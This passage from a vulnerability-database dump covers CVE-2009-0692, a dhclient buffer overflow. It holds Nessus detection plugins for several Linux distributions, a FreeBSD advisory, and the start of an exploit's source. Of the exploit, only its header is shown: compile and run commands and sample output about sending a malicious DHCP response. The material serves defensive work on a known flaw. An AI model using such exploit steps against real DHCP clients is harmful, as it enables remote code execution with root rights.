"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:12:33", "bulletinFamily": "scanner", "description": "The DHCP client (dhclient) could be crashed by a malicious DHCP server sending a overlong subnet field. (CVE-2009-0692)\n\nIn some circumstances code execution might be possible, but might is likely caught by the buffer overflow checking of the FORTIFY_SOURCE extension.", "modified": "2014-06-13T00:00:00", "id": "SUSE_DHCP-6336.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=41996", "published": "2009-10-06T00:00:00", "title": "openSUSE 10 Security Update : dhcp (dhcp-6336)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update dhcp-6336.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(41996);\n script_version (\"$Revision: 1.5 $\");\n script_cvs_date(\"$Date: 2014/06/13 20:06:06 $\");\n\n script_cve_id(\"CVE-2009-0692\");\n\n script_name(english:\"openSUSE 10 Security Update : dhcp (dhcp-6336)\");\n script_summary(english:\"Check for the dhcp-6336 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The DHCP client (dhclient) could be crashed by a malicious DHCP server\nsending a overlong subnet field. (CVE-2009-0692)\n\nIn some circumstances code execution might be possible, but might is\nlikely caught by the buffer overflow checking of the FORTIFY_SOURCE\nextension.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected dhcp packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dhcp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dhcp-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dhcp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dhcp-relay\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dhcp-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/10/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2014 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.3\", reference:\"dhcp-3.0.6-24.4\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"dhcp-client-3.0.6-24.4\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"dhcp-devel-3.0.6-24.4\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"dhcp-relay-3.0.6-24.4\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"dhcp-server-3.0.6-24.4\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dhcp-client\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:12:03", "bulletinFamily": "scanner", "description": "A vulnerability has been found and corrected in ISC DHCP :\n\nStack-based buffer overflow in the script_write_params method in client/dhclient.c in ISC DHCP dhclient 4.1 before 4.1.0p1, 4.0 before 4.0.1p1, 3.1 before 3.1.2p1, 3.0, and 2.0 allows remote DHCP servers to execute arbitrary code via a crafted subnet-mask option (CVE-2009-0692).\n\nThis update provides fixes for this vulnerability.", "modified": "2019-01-02T00:00:00", "id": "MANDRIVA_MDVSA-2009-151.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=39804", "published": "2009-07-16T00:00:00", "title": "Mandriva Linux Security Advisory : dhcp (MDVSA-2009:151)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2009:151. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(39804);\n script_version (\"1.14\");\n script_cvs_date(\"Date: 2019/01/02 16:37:54\");\n\n script_cve_id(\"CVE-2009-0692\");\n script_bugtraq_id(35668);\n script_xref(name:\"MDVSA\", value:\"2009:151\");\n\n script_name(english:\"Mandriva Linux Security Advisory : dhcp (MDVSA-2009:151)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability has been found and corrected in ISC DHCP :\n\nStack-based buffer overflow in the script_write_params method in\nclient/dhclient.c in ISC DHCP dhclient 4.1 before 4.1.0p1, 4.0 before\n4.0.1p1, 3.1 before 3.1.2p1, 3.0, and 2.0 allows remote DHCP servers\nto execute arbitrary code via a crafted subnet-mask option\n(CVE-2009-0692).\n\nThis update provides fixes for this vulnerability.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:dhcp-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:dhcp-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:dhcp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:dhcp-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:dhcp-relay\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:dhcp-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2008.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2009.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2009.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2008.1\", reference:\"dhcp-client-3.0.6-5.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"dhcp-common-3.0.6-5.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"dhcp-devel-3.0.6-5.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"dhcp-doc-3.0.6-5.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"dhcp-relay-3.0.6-5.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"dhcp-server-3.0.6-5.1mdv2008.1\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2009.0\", reference:\"dhcp-client-3.0.7-1.3mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"dhcp-common-3.0.7-1.3mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"dhcp-devel-3.0.7-1.3mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"dhcp-doc-3.0.7-1.3mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"dhcp-relay-3.0.7-1.3mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"dhcp-server-3.0.7-1.3mdv2009.0\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2009.1\", reference:\"dhcp-client-4.1.0-5.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"dhcp-common-4.1.0-5.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"dhcp-devel-4.1.0-5.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"dhcp-doc-4.1.0-5.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"dhcp-relay-4.1.0-5.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"dhcp-server-4.1.0-5.1mdv2009.1\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:12:29", "bulletinFamily": "scanner", "description": "The DHCP client (dhclient) could be crashed by a malicious DHCP server sending a overlong subnet field. (CVE-2009-0692)\n\nIn some circumstances code execution might be possible, but might be caught by the buffer overflow checking in newer distributions. (SLES 10 and 11).", "modified": "2012-05-17T00:00:00", "id": "SUSE_DHCP-6335.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=41502", "published": "2009-09-24T00:00:00", "title": "SuSE 10 Security Update : dhclient (ZYPP Patch Number 6335)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(41502);\n script_version (\"$Revision: 1.8 $\");\n script_cvs_date(\"$Date: 2012/05/17 11:05:45 $\");\n\n script_cve_id(\"CVE-2009-0692\");\n\n script_name(english:\"SuSE 10 Security Update : dhclient (ZYPP Patch Number 6335)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The DHCP client (dhclient) could be crashed by a malicious DHCP server\nsending a overlong subnet field. (CVE-2009-0692)\n\nIn some circumstances code execution might be possible, but might be\ncaught by the buffer overflow checking in newer distributions. (SLES\n10 and 11).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-0692.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6335.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/06/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2012 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"dhcp-3.0.3-23.55\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"dhcp-client-3.0.3-23.55\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"dhcp-3.0.3-23.55\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"dhcp-client-3.0.3-23.55\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"dhcp-devel-3.0.3-23.55\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"dhcp-relay-3.0.3-23.55\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"dhcp-server-3.0.3-23.55\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:12:09", "bulletinFamily": "scanner", "description": "The DHCP client (dhclient) could be crashed by a malicious DHCP server sending a overlong subnet field. (CVE-2009-0692)\n\nIn some circumstances code execution might be possible, but might is likely caught by the buffer overflow checking of the FORTIFY_SOURCE extension.", "modified": "2014-06-13T00:00:00", "id": "SUSE_11_1_DHCP-090626.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=40212", "published": "2009-07-21T00:00:00", "title": "openSUSE Security Update : dhcp (dhcp-1067)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update dhcp-1067.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(40212);\n script_version(\"$Revision: 1.8 $\");\n script_cvs_date(\"$Date: 2014/06/13 19:49:33 $\");\n\n script_cve_id(\"CVE-2009-0692\");\n\n script_name(english:\"openSUSE Security Update : dhcp (dhcp-1067)\");\n script_summary(english:\"Check for the dhcp-1067 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The DHCP client (dhclient) could be crashed by a malicious DHCP server\nsending a overlong subnet field. (CVE-2009-0692)\n\nIn some circumstances code execution might be possible, but might is\nlikely caught by the buffer overflow checking of the FORTIFY_SOURCE\nextension.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=515599\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected dhcp packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dhcp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dhcp-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dhcp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dhcp-relay\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dhcp-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/06/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2014 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.1\", reference:\"dhcp-3.1.1-6.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"dhcp-client-3.1.1-6.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"dhcp-devel-3.1.1-6.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"dhcp-relay-3.1.1-6.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"dhcp-server-3.1.1-6.5.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dhcp-client\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:19:22", "bulletinFamily": "scanner", "description": "From Red Hat Security Advisory 2009:1136 :\n\nUpdated dhcp packages that fix a security issue are now available for Red Hat Enterprise Linux 4 and 4.7 Extended Update Support.\n\nThis update has been rated as having critical security impact by the Red Hat Security Response Team.\n\nThe Dynamic Host Configuration Protocol (DHCP) is a protocol that allows individual devices on an IP network to get their own network configuration information, including an IP address, a subnet mask, and a broadcast address.\n\nThe Mandriva Linux Engineering Team discovered a stack-based buffer overflow flaw in the ISC DHCP client. If the DHCP client were to receive a malicious DHCP response, it could crash or execute arbitrary code with the permissions of the client (root). (CVE-2009-0692)\n\nUsers of DHCP should upgrade to these updated packages, which contain a backported patch to correct this issue.", "modified": "2018-07-18T00:00:00", "id": "ORACLELINUX_ELSA-2009-1136.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=67886", "published": "2013-07-12T00:00:00", "title": "Oracle Linux 4 : dhcp (ELSA-2009-1136)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2009:1136 and \n# Oracle Linux Security Advisory ELSA-2009-1136 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(67886);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/07/18 17:43:56\");\n\n script_cve_id(\"CVE-2009-0692\");\n script_bugtraq_id(35668);\n script_xref(name:\"RHSA\", value:\"2009:1136\");\n\n script_name(english:\"Oracle Linux 4 : dhcp (ELSA-2009-1136)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2009:1136 :\n\nUpdated dhcp packages that fix a security issue are now available for\nRed Hat Enterprise Linux 4 and 4.7 Extended Update Support.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nThe Dynamic Host Configuration Protocol (DHCP) is a protocol that\nallows individual devices on an IP network to get their own network\nconfiguration information, including an IP address, a subnet mask, and\na broadcast address.\n\nThe Mandriva Linux Engineering Team discovered a stack-based buffer\noverflow flaw in the ISC DHCP client. If the DHCP client were to\nreceive a malicious DHCP response, it could crash or execute arbitrary\ncode with the permissions of the client (root). (CVE-2009-0692)\n\nUsers of DHCP should upgrade to these updated packages, which contain\na backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2009-July/001075.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected dhcp packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dhclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dhcp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dhcp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 4\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL4\", reference:\"dhclient-3.0.1-65.el4_8.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"dhcp-3.0.1-65.el4_8.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"dhcp-devel-3.0.1-65.el4_8.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dhclient / dhcp / dhcp-devel\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2018-08-31T01:15:25", "bulletinFamily": "unix", "description": "\nUS-CERT reports:\n\nThe ISC DHCP dhclient application contains a stack buffer\n\t overflow, which may allow a remote, unauthenticated attacker to\n\t execute arbitrary code with root privileges.\n\n", "modified": "2009-07-21T00:00:00", "published": "2009-07-14T00:00:00", "id": "C444C8B7-7169-11DE-9AB7-000C29A67389", "href": "https://vuxml.freebsd.org/freebsd/c444c8b7-7169-11de-9ab7-000c29a67389.html", "title": "isc-dhcp-client -- Stack overflow vulnerability", "type": "freebsd", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T16:25:07", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-66748", "id": "SSV:66748", "title": "ISC DHCP dhclient < 3.1.2p1 Remote Buffer Overflow PoC", "type": "seebug", "sourceData": "\n /*\r\n * cve-2009-0692.c\r\n *\r\n * ISC DHCP dhclient < 3.1.2p1 Remote Exploit\r\n * Jon Oberheide <jon@oberheide.org>\r\n * http://jon.oberheide.org\r\n * \r\n * Information:\r\n * \r\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0692\r\n * \r\n * Stack-based buffer overflow in the script_write_params method in \r\n * client/dhclient.c in ISC DHCP dhclient 4.1 before 4.1.0p1, 4.0 before \r\n * 4.0.1p1, 3.1 before 3.1.2p1, 3.0, and 2.0 allows remote DHCP servers to \r\n * execute arbitrary code via a crafted subnet-mask option.\r\n * \r\n * Usage:\r\n *\r\n * $ gcc cve-2009-0692.c -o cve-2009-0692 -lpcap -ldnet\r\n * $ sudo ./cve-2009-0692\r\n * [+] listening on eth0: ip and udp and src port 68 and dst port 67\r\n * [+] snarfed DHCP request from 00:19:d1:90:e5:4a with xid 0x120f8920\r\n * [+] sending malicious DHCP response to 